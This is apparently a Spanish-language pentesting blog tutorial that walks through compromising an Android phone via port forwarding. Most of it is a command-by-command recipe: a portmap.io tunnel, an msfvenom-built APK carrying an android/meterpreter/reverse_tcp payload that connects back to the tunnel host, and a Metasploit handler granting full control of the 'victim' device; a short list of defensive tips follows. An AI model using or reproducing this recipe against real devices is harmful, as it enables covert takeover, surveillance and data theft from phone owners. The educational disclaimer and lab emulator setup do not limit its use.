Enviado por J3ss3SHL el Dom, 03/03/2019 - 18:45
Android hack

Hoy el equipo de Security hack labs, les tiene preparado este ejercicio, el método consiste en acceder remotamente a un equipo android mediante reenvió de puertos.

Requerimiento:

  • Sistema operativo como kali linux, blackarch, o cualquier otro que puedas realizar pruebas de penetración.
  • Tener instalado metasploit.
  • Un emulador de android cono genymotion

"Este tutorial es de carácter educativo cualquier estupidez que haga quedan de su parte".

Primer paso:

Debemos crear y configurar nuestro perfil en https://portmap.io

Llenar formulario

Segundo paso: Activamos la cuenta con el link de activación en nuestro correo

Tercer paso: Creamos una nueva configuración como se ve en la siguiente imagen, también debemos descargar el archivo .ovpn

Name "El que usted quiera"
Type OpenVpn
Proto tcp

,

configuración de puertos

Cuarto paso:

Entramos en Mapping rule, creamos una nueva regla, mi caso voy a usar el 5555.

android

Quinto paso:

Debemos guarda los datos creados, ya que lo vamos a usar mas adelante.

Sexto paso:

Debemos asegurarnos que tenemos instalado openvpn, en mi caso yo uso archlinux el comando para instalar es:

sudo pacman -S openvpn

Para conectar debemos tener en cuenta el directorio donde se guardo el archivo .ovpn de perfil creado en el paso tres.

sudo openvpn --config 'nombre_del_archivo_creado.ovpn'

Podemos ver la conexión y la ip privada.

ip a

Creamos nuestra .apk, en este paso es importante conocer LHOST y LPORT, eso datos los puedes encontrar en el archivo guardado en el "quinto paso".

msfvenom -p android/meterpreter/reverse_tcp lhost=host de portmap.io lport=puerto de portmap.io > Archivo.apk

'Debemos instalar .apk generada, en mi caso en una maquina virtual donde tengo el sistema android'.

Abrimos otra terminal iniciamos metasploit y colocamos los siguientes datos:

sudo msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost (ip del túnel VPN)
set lport (puerto que establecieron al crear la regla en portmap.io)
exploit -j

# Una vez establecida la conexión reversa
sessions -l
sessions -i (número de la sessión)

Una vez establecida la conexión con el equipo android victima, podemos usar con el comando 'help' podemos desplegar el menú, observamos que tenemos el acceso total del teléfono.

 

Como podemos protegernos de esos tipos de ataques?

  • Mantener un sistema operativo actualizado, aunque este tipo de ataque ya se ha realizado con éxito en la ultima versión de android. 
  • Mantener la opción de instalar aplicaciones de tercero en modo apagado.
  • Procurar no instalar app de dudosa procedencia, muchas veces instalamos cualquier aplicación sin querer le estamos dando acceso total de nuestro teléfono.
  • También podemos aislar las aplicaciones con island. https://securityhacklabs.net/articulo/seguridad-android-aislamiento-de-aplicaciones-con-island

Registrate en el foro, síguenos en FacebookTwitterunete a nuestro chat en Discord y no olvides compartirnos en las redes sociales. También puede hacernos una donación o comprar nuestros servicios.

Etiquetas

Acerca del autor

Pentester. Estudiante de ingeniería informática, Twitter @j3ss3SHL